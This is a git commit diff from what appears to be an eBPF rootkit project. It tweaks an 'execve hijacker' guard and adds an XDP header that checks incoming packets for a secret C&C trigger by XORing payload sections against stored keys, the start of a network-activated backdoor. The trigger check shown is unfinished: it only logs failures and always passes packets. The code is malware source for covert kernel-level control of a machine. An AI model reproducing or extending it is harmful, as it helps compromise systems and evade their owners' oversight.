Included new version of custom lib. Added checks for backdoor triggering

2025-12-25 19:03:07 +08:00 · 2022-05-04 04:40:25 -04:00
parent 25ef3acc5a
commit 073a911f74
21 changed files with 1799 additions and 2124 deletions
--- a/src/ebpf/include/bpf/exec.h
+++ b/src/ebpf/include/bpf/exec.h
@@ -86,7 +86,7 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c

 static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ctx *ctx, __u64 pid_tgid){
    //Check if the exec hijacker is active already
-    if(hijacker_state == 1){
+    if(hijacker_state == 1 || EXEC_HIJACK_ACTIVE_TEMP == 0){
        return 0;
    }
    bpf_printk("Starting execve hijacker\n");
--- a/src/ebpf/include/xdp/backdoor.h
+++ b/src/ebpf/include/xdp/backdoor.h
@@ -0,0 +1,43 @@
+#ifndef __BPF_BACKDOOR
+#define __BPF_BACKDOOR
+
+#include "headervmlinux.h"
+
+#include <bpf/bpf_helpers.h>
+#include "../../common/c&c.h"
+
+static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){
+    char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN]; 
+    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+
+    //Undoing the trigger secret packet to check it is the one expected
+
+    //Loading keys
+    __builtin_memcpy(key1, CC_TRIGGER_SYN_PACKET_KEY_1, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    __builtin_memcpy(key2, CC_TRIGGER_SYN_PACKET_KEY_2, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+
+    //S1 XOR K1
+    __builtin_memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    __builtin_memcpy(section2, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result[ii] = section[ii] ^ section2[ii];
+        if(result[ii]!=key1[ii]){
+            bpf_printk("FAIL\n");
+        }
+    }
+    bpf_printk("Finished V1 check\n");
+
+    return XDP_PASS;
+
+    
+
+
+
+}
+
+#endif
--- a/src/ebpf/include/xdp/xdp_helper.h
+++ b/src/ebpf/include/xdp/xdp_helper.h
@@ -43,8 +43,7 @@ static __always_inline struct expand_return expand_tcp_packet_payload(struct xdp
    __builtin_memcpy(&ip_copy, ip, sizeof(struct iphdr));
    __builtin_memcpy(&tcp_copy, tcp, sizeof(struct tcphdr));

-    if (bpf_xdp_adjust_tail(ctx, (int)(sizeof(char)*more_bytes)) != 0)
-    {
+    if (bpf_xdp_adjust_tail(ctx, (int)(sizeof(char)*more_bytes)) != 0){
        //Failed to expand
        bpf_printk("Failed to expand a tcp packet reserved bytes by %i\n", more_bytes);
        ret.code = -1;//The rest is undefined